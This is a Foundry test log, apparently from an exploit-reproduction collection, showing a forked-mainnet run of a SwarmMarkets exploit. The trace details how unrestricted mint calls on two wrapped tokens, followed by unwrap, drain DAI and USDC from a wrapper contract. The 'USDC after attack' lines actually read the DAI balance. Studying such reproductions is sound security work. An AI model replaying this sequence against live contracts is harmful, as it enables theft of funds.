Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.17s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/SwarmMarkets_exp.sol:33:5:
   |
33 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-02/SwarmMarkets_exp.sol:26:1:
   |
26 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-02/SwarmMarkets_exp.sol:55:5:
   |
55 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 621.02ms (4.50ms CPU time)

Ran 1 test for src/test/2024-02/SwarmMarkets_exp.sol:ContractTest
[PASS] testExploit() (gas: 157799)
Logs:
  Attacker DAI balance before attack:: 0.000000000000000000
  Attacker USDC balance before attack:: 0.000000000000000000
  Attacker DAI balance after attack:: 7729.322331047062319597
  Attacker USDC balance after attack:: 7729.322331047062319597

Traces:
  [17993] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19286456 [1.928e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(XTOKEN: [0xD08E245Fdb3f1504aea4056e2C71615DA7001440], "XTOKEN")
    │   └─ ← [Return]
    ├─ [0] VM::label(XTOKEN2: [0x0a3fbF5B4cF80DB51fCAe21efe63f6a36D45d2B2], "XTOKEN2")
    │   └─ ← [Return]
    ├─ [0] VM::label(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe], "wrapper")
    │   └─ ← [Return]
    ├─ [0] VM::label(DAI: [0x6B175474E89094C44Da98b954EedeAC495271d0F], "DAI")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    └─ ← [Stop]

  [202514] ContractTest::testExploit()
    ├─ [2602] DAI::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Attacker DAI balance before attack:", val: 0, decimals: 18)
    ├─ [602] DAI::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance before attack:", val: 0, decimals: 18)
    ├─ [2602] DAI::balanceOf(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe]) [staticcall]
    │   └─ ← [Return] 7729322331047062319597 [7.729e21]
    ├─ [32080] XTOKEN::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7729322331047062319597 [7.729e21])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7729322331047062319597 [7.729e21])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000001a301e52c61ea5eb1ed
    │   │   @ 2: 0x00000000000000000000000000000000000000000009512373711c4aadd9ea00 → 0x0000000000000000000000000000000000000000000952c6755648ac98389bed
    │   └─ ← [Stop]
    ├─ [9839] USDC::balanceOf(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe]) [staticcall]
    │   ├─ [2553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe]) [delegatecall]
    │   │   └─ ← [Return] 3516232 [3.516e6]
    │   └─ ← [Return] 3516232 [3.516e6]
    ├─ [32080] XTOKEN2::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3516232 [3.516e6])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3516232 [3.516e6])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000000000000000035a748
    │   │   @ 2: 0x0000000000000000000000000000000000000000000847b32ff4cb0236e6263f → 0x0000000000000000000000000000000000000000000847b32ff4cb02371bcd87
    │   └─ ← [Stop]
    ├─ [602] DAI::balanceOf(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe]) [staticcall]
    │   └─ ← [Return] 7729322331047062319597 [7.729e21]
    ├─ [34390] wrapper::unwrap(XTOKEN: [0xD08E245Fdb3f1504aea4056e2C71615DA7001440], 7729322331047062319597 [7.729e21])
    │   ├─ [3574] XTOKEN::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7729322331047062319597 [7.729e21])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 7729322331047062319597 [7.729e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000001a301e52c61ea5eb1ed → 0
    │   │   │   @ 2: 0x0000000000000000000000000000000000000000000952c6755648ac98389bed → 0x00000000000000000000000000000000000000000009512373711c4aadd9ea00
    │   │   └─ ← [Stop]
    │   ├─ [26174] DAI::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7729322331047062319597 [7.729e21])
    │   │   ├─ emit Transfer(from: wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7729322331047062319597 [7.729e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x0000000000000000000000000000000000000000000001a301e52c61ea5eb1ed
    │   │   │   @ 0x9a9ba79d9aafca8b71054e3f482ed0d06f6ce0ae7b87b1b635acb1981433b0fc: 0x0000000000000000000000000000000000000000000001a301e52c61ea5eb1ed → 0
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [1339] USDC::balanceOf(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe]) [delegatecall]
    │   │   └─ ← [Return] 3516232 [3.516e6]
    │   └─ ← [Return] 3516232 [3.516e6]
    ├─ [40368] wrapper::unwrap(XTOKEN2: [0x0a3fbF5B4cF80DB51fCAe21efe63f6a36D45d2B2], 3516232 [3.516e6])
    │   ├─ [3574] XTOKEN2::burnFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3516232 [3.516e6])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3516232 [3.516e6])
    │   │   ├─  storage changes:
    │   │   │   @ 2: 0x0000000000000000000000000000000000000000000847b32ff4cb02371bcd87 → 0x0000000000000000000000000000000000000000000847b32ff4cb0236e6263f
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000000000000000035a748 → 0
    │   │   └─ ← [Stop]
    │   ├─ [32152] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3516232 [3.516e6])
    │   │   ├─ [31363] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3516232 [3.516e6]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: wrapper: [0x2b9dc65253c035Eb21778cB3898eab5A0AdA0cCe], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3516232 [3.516e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfcf5f1dc8f0901466f7faa91d045222edeb831bc0107b60b07392bd647459aea: 0x000000000000000000000000000000000000000000000000000000000035a748 → 0
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000000035a748
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [602] DAI::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 7729322331047062319597 [7.729e21]
    ├─ emit log_named_decimal_uint(key: "Attacker DAI balance after attack:", val: 7729322331047062319597 [7.729e21], decimals: 18)
    ├─ [602] DAI::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 7729322331047062319597 [7.729e21]
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance after attack:", val: 7729322331047062319597 [7.729e21], decimals: 18)
    ├─  storage changes:
    │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000000035a748
    │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000000000000000035a748
    │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x0000000000000000000000000000000000000000000001a301e52c61ea5eb1ed
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.81s (5.50s CPU time)

Ran 2 test suites in 6.83s (7.43s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
